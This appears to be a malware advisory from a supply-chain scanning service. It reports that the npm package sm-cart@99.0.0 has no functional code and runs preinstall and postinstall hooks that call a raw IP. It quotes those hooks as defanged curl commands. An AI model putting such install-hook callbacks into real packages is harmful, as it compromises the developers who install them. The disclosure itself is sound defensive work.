LWA-2026-11573 confirmed malware

sm-cart@99.0.0

Malicious code in sm-cart (npm)

T1059 · Command and Scripting InterpreterT1071.001 · Web Protocols

Analysis

The package's preinstall and postinstall hooks each run `curl -s hxxp://16[.]192[.]173[.]5/sm-cart/pre` and `curl -s hxxp://16[.]192[.]173[.]5/sm-cart/post` respectively, making an outbound network callback to the raw IP 16[.]192[.]173[.]5 on every install. The package contains no functional code — its only module logs a message and exports an empty object — so the sole purpose of the install hooks is the network callback to 16[.]192[.]173[.]5.

analyzed by
Leitwacht
first seen
Aug 23, 2026, 06:30 PM
analyzed
Aug 23, 2026, 06:30 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.